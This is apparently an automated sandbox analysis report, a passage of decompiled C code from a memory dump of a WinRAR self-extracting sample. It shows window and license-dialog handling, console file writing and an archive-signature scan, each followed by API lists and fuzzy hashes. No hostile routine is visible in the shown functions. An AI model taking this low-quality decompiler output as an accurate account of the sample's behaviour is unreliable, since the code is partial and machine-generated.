                                                                                                                0x00ee3f05
                                                                                                                0x00ee3f0b
                                                                                                                0x00ee3f10
                                                                                                                0x00ee3f12
                                                                                                                0x00ee3f15
                                                                                                                0x00ee3f1a
                                                                                                                0x00ee3f24
                                                                                                                0x00ee3f2b
                                                                                                                0x00ee3f2e
                                                                                                                0x00ee3f35
                                                                                                                0x00ee3f3c
                                                                                                                0x00ee3f68
                                                                                                                0x00ee3f8e
                                                                                                                0x00ee3f90
                                                                                                                0x00000000
                                                                                                                0x00ee3f6a
                                                                                                                0x00ee3f6d
                                                                                                                0x00ee4034
                                                                                                                0x00ee4040
                                                                                                                0x00ee404b
                                                                                                                0x00ee4050
                                                                                                                0x00ee3f73
                                                                                                                0x00ee3f7a
                                                                                                                0x00ee3f7f
                                                                                                                0x00ee3f85
                                                                                                                0x00ee3f8b
                                                                                                                0x00000000
                                                                                                                0x00ee3f8b
                                                                                                                0x00ee3f85
                                                                                                                0x00ee3f6d
                                                                                                                0x00ee3f3e
                                                                                                                0x00ee3f42
                                                                                                                0x00ee3f45
                                                                                                                0x00ee3f4b
                                                                                                                0x00ee3f4d
                                                                                                                0x00ee3f50
                                                                                                                0x00ee3f54
                                                                                                                0x00ee3f91
                                                                                                                0x00ee3f94
                                                                                                                0x00ee3f95
                                                                                                                0x00ee3f9a
                                                                                                                0x00ee3fa0
                                                                                                                0x00ee3fa6
                                                                                                                0x00ee3fb5
                                                                                                                0x00ee3fbb
                                                                                                                0x00ee3fc1
                                                                                                                0x00ee3fc6
                                                                                                                0x00ee3fce
                                                                                                                0x00ee3fe2
                                                                                                                0x00ee4055
                                                                                                                0x00ee405b
                                                                                                                0x00ee3fe4
                                                                                                                0x00ee3fec
                                                                                                                0x00ee3ff5
                                                                                                                0x00ee3ffb
                                                                                                                0x00000000
                                                                                                                0x00ee3ffd
                                                                                                                0x00ee3fff
                                                                                                                0x00ee4002
                                                                                                                0x00ee4006
                                                                                                                0x00ee401b
                                                                                                                0x00000000
                                                                                                                0x00ee401d
                                                                                                                0x00ee4021
                                                                                                                0x00ee4023
                                                                                                                0x00ee4026
                                                                                                                0x00000000
                                                                                                                0x00ee4026
                                                                                                                0x00ee4021
                                                                                                                0x00ee401b
                                                                                                                0x00ee3ffb
                                                                                                                0x00ee3ff5
                                                                                                                0x00ee3fe2
                                                                                                                0x00ee3fc6
                                                                                                                0x00ee3fa0
                                                                                                                0x00000000
                                                                                                                0x00ee4029
                                                                                                                0x00ee4029
                                                                                                                0x00ee405d
                                                                                                                0x00ee406f

                                                                                                                APIs
                                                                                                                • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00EE4632,?,00000000,?,00000000,00000000), ref: 00EE3EFF
                                                                                                                • __fassign.LIBCMT ref: 00EE3F7A
                                                                                                                • __fassign.LIBCMT ref: 00EE3F95
                                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00EE3FBB
                                                                                                                • WriteFile.KERNEL32(?,?,00000000,2F,00000000,?,?,?,?,?,?,?,?,?,00EE4632,?), ref: 00EE3FDA
                                                                                                                • WriteFile.KERNEL32(?,?,00000001,2F,00000000,?,?,?,?,?,?,?,?,?,00EE4632,?), ref: 00EE4013
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                                                • String ID: 2F
                                                                                                                • API String ID: 1324828854-3616534977
                                                                                                                • Opcode ID: 0b2173388211f93c1346314fd2a7333567eab17e2342179c22aaf3b48b1d48d6
                                                                                                                • Instruction ID: 8e3ef262e6f11eacec1a364bbe8f903d92899a11ceee03be27abadbfd357eac2
                                                                                                                • Opcode Fuzzy Hash: 0b2173388211f93c1346314fd2a7333567eab17e2342179c22aaf3b48b1d48d6
                                                                                                                • Instruction Fuzzy Hash: BB51C4B1E0028D9FCB20CFA9D885AEEBBF4EF09314F14416AE565F7291D7309945CB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECE9B5, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 108COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 43%
                                                                                                                			E00ECE9B5(intOrPtr* __ecx, void* __eflags, intOrPtr _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16, char _a20) {
				struct tagRECT _v16;
				intOrPtr _v28;
				intOrPtr _v36;
				void* __ebx;
				void* __edi;
				intOrPtr _t32;
				struct HWND__* _t43;
				intOrPtr* _t51;
				void* _t58;
				WCHAR* _t65;
				struct HWND__* _t66;

				_t66 = _a8;
				_t51 = __ecx;
				 *(__ecx + 8) = _t66;
				 *((char*)(__ecx + 0x26)) = _a20;
				ShowWindow(_t66, 0);
				E00ECE6E4(_t51, _a4);
				if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
					L00ED869E( *((intOrPtr*)(_t51 + 0x1c)));
				}
				if(_a12 != 0) {
					_push(_a12);
					_t32 = E00EDC1D6(_t51, _t58);
				} else {
					_t32 = 0;
				}
				 *((intOrPtr*)(_t51 + 0x1c)) = _t32;
				 *((intOrPtr*)(_t51 + 0x20)) = _a16;
				GetWindowRect(_t66,  &_v16);
				 *0xf260dc(0,  *0xf26128(_t66,  &_v16, 2));
				if( *(_t51 + 4) != 0) {
					 *0xf260e4( *(_t51 + 4));
				}
				_t39 = _v36;
				_t19 = _t39 + 1; // 0x1
				_t43 =  *0xf260ec(0, L"RarHtmlClassName", 0, 0x40000000, _t19, _v36, _v28 - _v36 - 2, _v28 - _v36,  *0xf26128(_t66, 0,  *_t51, _t51, _t58));
				 *(_t51 + 4) = _t43;
				if( *((intOrPtr*)(_t51 + 0x10)) != 0) {
					__eflags = _t43;
					if(_t43 != 0) {
						ShowWindow(_t43, 5);
						return  *0xf260e0( *(_t51 + 4));
					}
				} else {
					if(_t66 != 0 &&  *((intOrPtr*)(_t51 + 0x20)) == 0) {
						_t75 =  *((intOrPtr*)(_t51 + 0x1c));
						if( *((intOrPtr*)(_t51 + 0x1c)) != 0) {
							_t43 = E00ECE7DC(_t51, _t75,  *((intOrPtr*)(_t51 + 0x1c)));
							_t65 = _t43;
							if(_t65 != 0) {
								ShowWindow(_t66, 5);
								SetWindowTextW(_t66, _t65);
								return L00ED869E(_t65);
							}
						}
					}
				}
				return _t43;
			}














                                                                                                                0x00ece9be
                                                                                                                0x00ece9c2
                                                                                                                0x00ece9c8
                                                                                                                0x00ece9cb
                                                                                                                0x00ece9ce
                                                                                                                0x00ece9da
                                                                                                                0x00ece9e3
                                                                                                                0x00ece9e8
                                                                                                                0x00ece9ed
                                                                                                                0x00ece9f3
                                                                                                                0x00ece9f9
                                                                                                                0x00ece9fd
                                                                                                                0x00ece9f5
                                                                                                                0x00ece9f5
                                                                                                                0x00ece9f5
                                                                                                                0x00ecea03
                                                                                                                0x00ecea0a
                                                                                                                0x00ecea13
                                                                                                                0x00ecea2a
                                                                                                                0x00ecea34
                                                                                                                0x00ecea39
                                                                                                                0x00ecea39
                                                                                                                0x00ecea3f
                                                                                                                0x00ecea4d
                                                                                                                0x00ecea7a
                                                                                                                0x00ecea80
                                                                                                                0x00ecea87
                                                                                                                0x00eceac1
                                                                                                                0x00eceac3
                                                                                                                0x00eceac8
                                                                                                                0x00000000
                                                                                                                0x00ecead1
                                                                                                                0x00ecea89
                                                                                                                0x00ecea8b
                                                                                                                0x00ecea92
                                                                                                                0x00ecea95
                                                                                                                0x00ecea9c
                                                                                                                0x00eceaa1
                                                                                                                0x00eceaa5
                                                                                                                0x00eceaaa
                                                                                                                0x00eceab2
                                                                                                                0x00000000
                                                                                                                0x00eceabe
                                                                                                                0x00eceaa5
                                                                                                                0x00ecea95
                                                                                                                0x00ecea8b
                                                                                                                0x00eceadd

                                                                                                                APIs
                                                                                                                • ShowWindow.USER32(?,00000000), ref: 00ECE9CE
                                                                                                                • GetWindowRect.USER32(?,00000000), ref: 00ECEA13
                                                                                                                • ShowWindow.USER32(?,00000005,00000000), ref: 00ECEAAA
                                                                                                                • SetWindowTextW.USER32(?,00000000), ref: 00ECEAB2
                                                                                                                • ShowWindow.USER32(00000000,00000005), ref: 00ECEAC8
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Window$Show$RectText
                                                                                                                • String ID: 4*$RarHtmlClassName$*
                                                                                                                • API String ID: 3937224194-9850087
                                                                                                                • Opcode ID: 4ce923045ae3672d0d0dcf34901ae6b673ddeea3a997a9df555ab0536918869c
                                                                                                                • Instruction ID: 710cbcad082af2cfb7f0e24cd2275594d98e00173dcf9f19cdc7b46644d3d12c
                                                                                                                • Opcode Fuzzy Hash: 4ce923045ae3672d0d0dcf34901ae6b673ddeea3a997a9df555ab0536918869c
                                                                                                                • Instruction Fuzzy Hash: 4931C031000314EFCB219F64DD48F6B7BA8FF48714F00856AFE49A6252CB35E912DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECFFA0, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E00ECFFA0(void* __ecx, void* __edx, void* __eflags, void* __fp0, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
				long _t9;
				long _t10;
				WCHAR* _t11;
				void* _t25;
				signed short _t28;
				void* _t29;
				intOrPtr* _t30;
				struct HWND__* _t34;
				intOrPtr _t35;
				void* _t36;
				struct HWND__* _t37;

				_t29 = __ecx;
				_t28 = _a12;
				_t35 = _a8;
				_t34 = _a4;
				if(E00EC11DA(__edx, _t34, _t35, _t28, _a16, L"LICENSEDLG", 0, 0) != 0) {
					L16:
					__eflags = 1;
					return 1;
				}
				_t36 = _t35 - 0x110;
				if(_t36 == 0) {
					E00ED1F2F(_t29, __edx, __eflags, __fp0, _t34);
					_t9 =  *0xf10b84;
					__eflags = _t9;
					if(_t9 != 0) {
						SendMessageW(_t34, 0x80, 1, _t9);
					}
					_t10 =  *0xf1b1ec;
					__eflags = _t10;
					if(_t10 != 0) {
						SendDlgItemMessageW(_t34, 0x66, 0x172, 0, _t10);
					}
					_t11 =  *0xf23304;
					__eflags = _t11;
					if(__eflags != 0) {
						SetWindowTextW(_t34, _t11);
					}
					_t37 = GetDlgItem(_t34, 0x65);
					SendMessageW(_t37, 0x435, 0, 0x10000);
					SendMessageW(_t37, 0x443, 0,  *0xf260b0(0xf));
					 *0xf260ac(_t34);
					_t30 =  *0xf0ca50; // 0x303f744
					E00ECE9B5(_t30, __eflags,  *0xf0ca40, _t37,  *0xf23300, 0, 0);
					L00ED869E( *0xf23304);
					L00ED869E( *0xf23300);
					goto L16;
				}
				if(_t36 != 1) {
					L5:
					return 0;
				}
				_t25 = (_t28 & 0x0000ffff) - 1;
				if(_t25 == 0) {
					_push(1);
					L7:
					 *0xf2609c(_t34);
					goto L16;
				}
				if(_t25 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}














                                                                                                                0x00ecffa0
                                                                                                                0x00ecffa1
                                                                                                                0x00ecffa7
                                                                                                                0x00ecffae
                                                                                                                0x00ecffc7
                                                                                                                0x00ed00b3
                                                                                                                0x00ed00b5
                                                                                                                0x00000000
                                                                                                                0x00ed00b5
                                                                                                                0x00ecffcd
                                                                                                                0x00ecffd3
                                                                                                                0x00ed0000
                                                                                                                0x00ed0005
                                                                                                                0x00ed000a
                                                                                                                0x00ed000c
                                                                                                                0x00ed0017
                                                                                                                0x00ed0017
                                                                                                                0x00ed001d
                                                                                                                0x00ed0022
                                                                                                                0x00ed0024
                                                                                                                0x00ed0030
                                                                                                                0x00ed0030
                                                                                                                0x00ed0036
                                                                                                                0x00ed003b
                                                                                                                0x00ed003d
                                                                                                                0x00ed0041
                                                                                                                0x00ed0041
                                                                                                                0x00ed0056
                                                                                                                0x00ed005e
                                                                                                                0x00ed0074
                                                                                                                0x00ed007b
                                                                                                                0x00ed0081
                                                                                                                0x00ed0096
                                                                                                                0x00ed00a1
                                                                                                                0x00ed00ac
                                                                                                                0x00000000
                                                                                                                0x00ed00b2
                                                                                                                0x00ecffd8
                                                                                                                0x00ecffe7
                                                                                                                0x00000000
                                                                                                                0x00ecffe7
                                                                                                                0x00ecffdd
                                                                                                                0x00ecffe0
                                                                                                                0x00ecfffb
                                                                                                                0x00ecffef
                                                                                                                0x00ecfff0
                                                                                                                0x00000000
                                                                                                                0x00ecfff0
                                                                                                                0x00ecffe5
                                                                                                                0x00ecffee
                                                                                                                0x00000000
                                                                                                                0x00ecffee
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                  • Part of subcall function 00EC11DA: GetDlgItem.USER32(00000000,00003021), ref: 00EC121E
                                                                                                                  • Part of subcall function 00EC11DA: SetWindowTextW.USER32(00000000,00EE7544), ref: 00EC1234
                                                                                                                • SendMessageW.USER32(?,00000080,00000001,?), ref: 00ED0017
                                                                                                                • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 00ED0030
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 00ED0041
                                                                                                                • GetDlgItem.USER32(?,00000065), ref: 00ED004A
                                                                                                                • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00ED005E
                                                                                                                • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00ED0074
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.504263666.0000000000EC1000.00000020.00020000.sdmp, Offset: 00EC0000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.504220943.0000000000EC0000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505107406.0000000000EE7000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505236670.0000000000EF1000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505296900.0000000000EF7000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505341126.0000000000F06000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505375670.0000000000F25000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.505408633.0000000000F26000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Item$TextWindow
                                                                                                                • String ID: LICENSEDLG
                                                                                                                • API String ID: 224466086-2177901306
                                                                                                                • Opcode ID: e9756db868c6279a3069a7d7042c2100eb1207a8a85262b3bb2f97ff65999b47
                                                                                                                • Instruction ID: 7822d5e57a8650cf42928784de373c43b884e0968346b7b566744411de6f5ad5
                                                                                                                • Opcode Fuzzy Hash: e9756db868c6279a3069a7d7042c2100eb1207a8a85262b3bb2f97ff65999b47
                                                                                                                • Instruction Fuzzy Hash: B521A332200208BBD631AF61EE59F7B3BADEB46B55F05501DF605F12A1CB669D03B632
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00ECBFD9, Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 302COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 66%
                                                                                                                			E00ECBFD9(signed int __edx) {
				signed int _t39;
				signed int _t42;
				signed int _t46;
				signed short _t52;
				signed short _t55;
				signed int _t64;
				intOrPtr _t65;
				intOrPtr _t69;
				signed int _t70;
				signed int _t71;
				signed int _t80;
				intOrPtr _t81;
				signed int _t82;
				intOrPtr _t90;
				signed int _t92;
				intOrPtr _t95;
				signed int _t96;
				signed int _t97;
				signed int _t101;
				signed int _t102;
				intOrPtr _t108;
				signed int _t110;
				intOrPtr _t121;
				signed int _t122;
				intOrPtr _t124;
				intOrPtr* _t126;
				intOrPtr _t127;
				intOrPtr* _t128;
				intOrPtr* _t129;
				intOrPtr _t130;
				intOrPtr* _t131;
				signed int _t132;
				signed int _t133;
				signed int _t139;
				signed int _t140;
				signed int _t141;
				signed int _t145;
				signed int _t149;
				signed int _t152;
				intOrPtr _t154;
				void* _t156;
				signed int _t157;

				_t122 = __edx;
				_t95 =  *0xf0b5c0; // 0x78e42b
				_t149 =  *0xf0b5c4; // 0x0
				 *((intOrPtr*)(_t156 + 0x10)) = 0;
				_push(_t132);
				_t157 = _t149;
				if(_t157 > 0 || _t157 >= 0 && _t95 > 0x2000) {
					_t39 = E00ED3930(_t95, _t149, 0x2000, 0);
					 *(_t156 + 0x1c) = _t39;
					__eflags = _t39 - 0x12;
					asm("cdq");
					if(_t39 <= 0x12) {
						_t96 = _t95 - _t39;
						__eflags = _t96;
						 *(_t156 + 0x14) = _t39;
						 *0xf0b5d8 = _t96;
						asm("sbb ebp, eax");
						 *0xf0b5dc = _t149;
						L22:
						asm("sbb eax, ebp");
						asm("adc eax, 0x0");
						_t42 = E00ED3660( *((intOrPtr*)(_t156 + 0x3c)) -  *(_t156 + 0x14) + 0x1fff,  *((intOrPtr*)(_t156 + 0x40)), 0x2000, 0);
						_t97 =  *(_t156 + 0x18);
						_t152 = 1;
						 *(_t156 + 0x1c) = _t42;
						__eflags = _t97;
						if(_t97 != 0) {
							L37:
							_t133 =  *0xf0b598; // 0x31dc72d
							_t124 =  *0xf0b594; // 0x0
							goto L38;
						}
						__eflags = _t132 | 0xffffffff;
						while(1) {
							L24:
							__eflags = _t152 - _t42;
							if(_t152 > _t42) {
								break;
							}
							_t110 =  *0xf0b5d8; // 0x78e000
							_t122 =  *0xf0b5dc; // 0x0
							_t126 =  *0xf0b5b8; // 0x0
							asm("adc edx, esi");
							 *0xf0b5d8 = _t110 + 0xffffe000;
							 *0xf0b5dc = _t122;
							 *0xee7220();
							 *((intOrPtr*)( *((intOrPtr*)( *_t126 + 0x10))))();
							_t69 = E00ECA505(_t122,  *0xf0b594, 0x2000, _t110 + 0xffffe000, _t122, 0);
							asm("cdq");
							 *0xf0b5a0 = _t69;
							 *0xf0b5a4 = _t122;
							__eflags = _t69 - 0x2000;
							if(_t69 != 0x2000) {
								break;
							}
							__eflags = _t122;
							if(_t122 != 0) {
								break;
							}
							_t127 =  *0xf0b594; // 0x0
							_t21 = _t127 + 0x1fff; // 0x1fff
							_t139 = _t21;
							while(1) {
								 *0xf0b598 = _t139;
								__eflags = _t139 - _t127;
								if(_t139 < _t127) {
									break;
								}
								_t70 = E00EC9982(_t139);
								__eflags = _t70;
								if(_t70 != 0) {
									_t140 = _t139 - _t127;
									_t71 = _t140;
									_t141 = _t140 | 0xffffffff;
									_t122 = _t71 * _t141 >> 0x20;
									 *0xf0b5a0 = _t71 * _t141 + 0x2000;
									asm("adc edx, 0x0");
									 *0xf0b5a4 = _t122;
									_t97 = 1;
									L32:
									E00EDAFA0( *0xf0b5ec, _t127, 3);
									_t42 =  *(_t156 + 0x28);
									_t156 = _t156 + 0xc;
									_t152 = _t152 + 1;
									__eflags = _t97;
									if(_t97 == 0) {
										goto L24;
									}
									goto L33;
								}
								_t139 = _t139 - 1;
								__eflags = _t139;
							}
							__eflags = _t139 | 0xffffffff;
							goto L32;
						}
						L33:
						__eflags = _t97;
						if(_t97 != 0) {
							goto L37;
						}
						goto L34;
					}
					_t128 =  *0xf0b5b8; // 0x0
					 *(_t156 + 0x14) = _t39;
					asm("sbb ebp, eax");
					 *(_t156 + 0x1c) = _t122;
					 *0xee7220();
					 *((intOrPtr*)( *_t128 + 0x10))();
					_t129 =  *0xf0b5b8; // 0x0
					 *0xee7220();
					_t80 =  *((intOrPtr*)( *((intOrPtr*)( *_t129 + 0x14))))();
					_t145 =  *(_t156 + 0x1c);
					 *0xf0b5d8 = _t80;
					 *0xf0b5dc = _t122;
					_t81 = E00ECA505(_t122,  *0xf0b594, _t145, _t95 - _t39, _t149, 0);
					asm("cdq");
					_t101 = _t122;
					 *0xf0b5a0 = _t81;
					 *0xf0b5a4 = _t101;
					__eflags = _t81 -  *(_t156 + 0x14);
					if(_t81 !=  *(_t156 + 0x14)) {
						goto L34;
					}
					__eflags = _t101 -  *((intOrPtr*)(_t156 + 0x10));
					if(_t101 !=  *((intOrPtr*)(_t156 + 0x10))) {
						goto L34;
					}
					_t130 =  *0xf0b594; // 0x0
					_t132 = _t145 + 0xffffffea + _t130;
					while(1) {
						 *0xf0b598 = _t132;
						__eflags = _t132 - _t130;
						if(_t132 < _t130) {
							break;
						}
						_t82 = E00EC9982(_t132);
						__eflags = _t82;
						if(_t82 != 0) {
							_t132 = _t132 - _t130;
							asm("cdq");
							 *0xf0b5a0 =  *0xf0b5a0 - _t132;
							asm("sbb ebx, edx");
							__eflags = 1;
							 *0xf0b5a4 = _t101;
							 *(_t156 + 0x18) = 1;
							L20:
							E00EDAFA0( *0xf0b5ec, _t130, 3);
							_t156 = _t156 + 0xc;
							goto L22;
						}
						_t132 = _t132 - 1;
						__eflags = _t132;
					}
					goto L20;
				} else {
					_t131 =  *0xf0b5b8; // 0x0
					 *0xee7220();
					 *((intOrPtr*)( *((intOrPtr*)( *_t131 + 0x10))))();
					_t90 = E00ECA505(_t122,  *0xf0b594,  *0xf0b5c0, 0, 0, 0);
					_t121 =  *0xf0b5c0; // 0x78e42b
					asm("cdq");
					_t154 = _t90;
					_t102 = _t122;
					 *0xf0b5a0 = _t154;
					asm("cdq");
					 *0xf0b5a4 = _t102;
					if(_t154 != _t121 || _t102 != _t122) {
						L34:
						_push(2);
						goto L35;
					} else {
						_t124 =  *0xf0b594; // 0x0
						_t3 = _t124 - 0x16; // -22
						_t133 = _t3 + _t121;
						while(1) {
							 *0xf0b598 = _t133;
							if(_t133 < _t124) {
								break;
							}
							_t92 = E00EC9982(_t133);
							__eflags = _t92;
							if(_t92 != 0) {
								asm("cdq");
								 *0xf0b5a0 = _t154 - _t133 - _t124;
								asm("sbb ebx, edx");
								 *0xf0b5a4 = _t102;
								L38:
								asm("cdq");
								 *0xefb548 = _t133 - _t124 +  *0xf0b5d8;
								_t27 = _t156 + 0x20; // 0x78e42b
								asm("adc edx, [0xf0b5dc]");
								 *0xefb54c = _t122;
								_t46 = E00ECA0EE(_t27, 0x16);
								__eflags = _t46;
								if(_t46 != 0) {
									 *0xf0b650 = E00EC9F88(_t156 + 0x24);
									 *0xf0b652 = E00EC9F88(_t156 + 0x26);
									_t52 = E00EC9F88(_t156 + 0x28);
									asm("cdq");
									 *0xf0b658 = _t52 & 0x0000ffff;
									 *0xf0b65c = _t122;
									_t55 = E00EC9F88(_t156 + 0x2a);
									asm("cdq");
									 *0xf0b660 = _t55 & 0x0000ffff;
									 *0xf0b664 = _t122;
									 *0xf0b668 = E00EC9F63(_t156 + 0x2c);
									 *0xf0b66c = 0;
									 *0xf0b670 = E00EC9F63(_t156 + 0x30);
									 *0xf0b674 = 0;
									 *0xf0b678 = E00EC9F88(_t156 + 0x34);
									asm("adc eax, ebx");
									_t64 = E00ECBD56( *((intOrPtr*)(_t156 + 0x3c)) + 0x4c, _t122, __eflags,  *((intOrPtr*)(_t156 + 0x3c)) + 0x4c,  *((intOrPtr*)(_t156 + 0x40)));
									__eflags = _t64;
									if(_t64 == 0) {
										_t108 =  *0xf0b670; // 0x78df70
										_t65 =  *0xf0b674; // 0x0
										asm("adc eax, [0xf0b66c]");
										 *0xefb554 = _t65;
										_t64 = 0;
										__eflags = 0;
										 *0xefb550 = _t108 +  *0xf0b668;
									}
									L42:
									return _t64;
								}
								_push(0x33);
								L35:
								_pop(_t64);
								goto L42;
							}
							_t133 = _t133 - 1;
							__eflags = _t133;
						}
						goto L34;
					}
				}
			}













































                                                                                                                0x00ecbfd9
                                                                                                                0x00ecbfdd
                                                                                                                0x00ecbfe6
                                                                                                                0x00ecbfec
                                                                                                                0x00ecbff5
                                                                                                                0x00ecbff7
                                                                                                                0x00ecbff9
                                                                                                                0x00ecc0a7
                                                                                                                0x00ecc0ac
                                                                                                                0x00ecc0b0
                                                                                                                0x00ecc0b3
                                                                                                                0x00ecc0b4
                                                                                                                0x00ecc18b
                                                                                                                0x00ecc18b
                                                                                                                0x00ecc18d
                                                                                                                0x00ecc193
                                                                                                                0x00ecc199
                                                                                                                0x00ecc19b
                                                                                                                0x00ecc1a3
                                                                                                                0x00ecc1af
                                                                                                                0x00ecc1be
                                                                                                                0x00ecc1c3
                                                                                                                0x00ecc1c8
                                                                                                                0x00ecc1ce
                                                                                                                0x00ecc1cf
                                                                                                                0x00ecc1d3
                                                                                                                0x00ecc1d5
                                                                                                                0x00ecc2b7
                                                                                                                0x00ecc2b7
                                                                                                                0x00ecc2bd
                                                                                                                0x00000000
                                                                                                                0x00ecc2bd
                                                                                                                0x00ecc1db
                                                                                                                0x00ecc1de
                                                                                                                0x00ecc1de
                                                                                                                0x00ecc1de
                                                                                                                0x00ecc1e0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecc1e6
                                                                                                                0x00ecc1ec
                                                                                                                0x00ecc1f8
                                                                                                                0x00ecc1fe
                                                                                                                0x00ecc200
                                                                                                                0x00ecc206
                                                                                                                0x00ecc217
                                                                                                                0x00ecc21f
                                                                                                                0x00ecc22d
                                                                                                                0x00ecc232
                                                                                                                0x00ecc233
                                                                                                                0x00ecc238
                                                                                                                0x00ecc23e
                                                                                                                0x00ecc240
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecc242
                                                                                                                0x00ecc244
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecc246
                                                                                                                0x00ecc24c
                                                                                                                0x00ecc24c
                                                                                                                0x00ecc25f
                                                                                                                0x00ecc25f
                                                                                                                0x00ecc265
                                                                                                                0x00ecc267
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecc255
                                                                                                                0x00ecc25a
                                                                                                                0x00ecc25c
                                                                                                                0x00ecc296
                                                                                                                0x00ecc298
                                                                                                                0x00ecc29a
                                                                                                                0x00ecc29d
                                                                                                                0x00ecc2a4
                                                                                                                0x00ecc2a9
                                                                                                                0x00ecc2ae
                                                                                                                0x00ecc2b4
                                                                                                                0x00ecc26c
                                                                                                                0x00ecc275
                                                                                                                0x00ecc27a
                                                                                                                0x00ecc27e
                                                                                                                0x00ecc281
                                                                                                                0x00ecc282
                                                                                                                0x00ecc284
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecc284
                                                                                                                0x00ecc25e
                                                                                                                0x00ecc25e
                                                                                                                0x00ecc25e
                                                                                                                0x00ecc269
                                                                                                                0x00000000
                                                                                                                0x00ecc269
                                                                                                                0x00ecc28a
                                                                                                                0x00ecc28a
                                                                                                                0x00ecc28c
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecc28c
                                                                                                                0x00ecc0ba
                                                                                                                0x00ecc0c4
                                                                                                                0x00ecc0ce
                                                                                                                0x00ecc0d2
                                                                                                                0x00ecc0d9
                                                                                                                0x00ecc0e1
                                                                                                                0x00ecc0e4
                                                                                                                0x00ecc0f1
                                                                                                                0x00ecc0f9
                                                                                                                0x00ecc0fb
                                                                                                                0x00ecc106
                                                                                                                0x00ecc10b
                                                                                                                0x00ecc111
                                                                                                                0x00ecc116
                                                                                                                0x00ecc117
                                                                                                                0x00ecc119
                                                                                                                0x00ecc11e
                                                                                                                0x00ecc124
                                                                                                                0x00ecc128
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecc132
                                                                                                                0x00ecc134
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecc13a
                                                                                                                0x00ecc143
                                                                                                                0x00ecc152
                                                                                                                0x00ecc152
                                                                                                                0x00ecc158
                                                                                                                0x00ecc15a
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00ecc148
                                                                                                                0x00ecc14d
                                                                                                                0x00ecc14f
                                                                                                                0x00ecc15e
                                                                                                                0x00ecc162
                                                                                                                0x00ecc163
                                                                                                                0x00ecc169
                                                                                                                0x00ecc16d
                                                                                                                0x00ecc16e
                                                                                                                0x00ecc174
                                                                                                                0x00ecc178
                                                                                                                0x00ecc181
                                                                                                                0x00ecc186
